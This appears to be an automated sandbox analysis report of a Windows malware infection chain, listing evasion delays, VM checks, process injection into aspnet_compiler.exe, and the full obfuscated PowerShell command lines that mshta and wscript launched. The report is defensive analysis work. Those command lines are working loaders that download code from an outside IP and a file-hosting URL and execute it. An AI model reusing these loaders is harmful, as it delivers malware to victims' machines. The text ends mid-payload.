Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4234	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5486	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6239	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3437	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1467	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 761	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3800	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5985	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6300	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176	Thread sleep count: 6239 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5512	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep count: 3437 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284	Thread sleep count: 1467 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300	Thread sleep count: 761 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5804	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5688	Thread sleep count: 3800 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1520	Thread sleep count: 5985 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6760	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6556	Thread sleep time: -300000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 11_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

11_2_00403D74

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: powershell.exe, 00000009.00000002.2442666046.0000000009E41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 4']qemU
Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.2204284614.00000000074CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2204058634.0000000007413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000002.2149281361.0000000005920000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\|
Source: powershell.exe, 00000001.00000002.2204058634.0000000007413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPMA
Source: powershell.exe, 00000009.00000002.2321272794.000000000054C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: aspnet_compiler.exe, 0000000B.00000002.3274760441.0000000001298000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mshta.exe, 00000000.00000003.2041669450.0000000002F35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}r

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 11_2_0040317B mov eax, dword ptr fs:[00000030h]

11_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 11_2_00402B7C GetProcessHeap,RtlAllocateHeap,

11_2_00402B7C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_5536.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: E51008	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCA7.tmp" "c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5T